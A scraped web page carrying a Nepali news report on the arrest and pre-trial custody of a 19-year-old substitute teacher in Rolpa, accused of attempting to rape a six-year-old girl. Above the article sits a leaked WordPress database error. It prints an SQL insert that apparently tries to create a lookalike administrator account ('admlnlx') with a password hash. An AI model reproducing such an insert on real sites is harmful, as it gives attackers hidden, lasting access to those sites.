WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrO8wVuOHHRE57L2C4Lyaldh17d9QU1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:40:55', '', 'admlnlx', 'admlnlx')
लिबाङ (रोल्पा), माघ १४ –
छ वर्षीया बालिकालाई जबर्जस्ती करणी गर्न खोजेको अभियोगमा पक्राउ परेका एक युवकलाई प्रहरीले पूर्पक्षका लागि थुनामा राखेको छ ।
पक्राउ पर्नेमा राङ्सी– ६ रोल्पाका १९ वर्षीय अर्जुन घर्तीमगर रहेका छन् । छ वर्षीया बालिकालाई जबर्जस्ती करणी गर्न खोजेको अभियोगमा जिल्ला अदालत रोल्पाले पूर्पक्षका लागि थुनामा राख्न दिएको आदेशानुसार प्रहरीले उनलाई बिहिवार थुनामा राखेको हो ।
पीडित बालिकाकी आमाका अनुसार विद्यालय गएकी छोरीलाई बाल शिक्षाको कक्षामै गत पुस २० गते घर्तीमगरले जबर्जस्ती करणी गर्न खोजेपछि बालिका रुदै कराउँदै घर आएकी थिइन् ।
घटना घटेको चार दिनपछि पीडितकी आमाले इलाका प्रहरी कार्यालय घर्तीगाउँमा जाहेरी निवेदन दिएकी थिइन् । जाहेरी दिएलगत्तै प्रहरीले घर्तीमगरलाई पक्राउ गरी आवश्यक अनुसन्धान सुरु गरेको थियो ।
थप अनुसन्धानका लागि जिल्ला अदालत रोल्पाले अभियुक्तलाई थुनामा राख्न आदेश दिएको छ ।
विद्यालयकी शिक्षिका बिदामा रहेका कारण आफ्ना भाइलाई सट्टा शिक्षकको रुपमा विद्यालय पठाएको र भाइले नै विद्यालय बिदा भइसकेपछि बालिकालाई ललाइफकाइ जबर्जस्ती करणीको प्रयास गरेको जनाएको छ । – रासस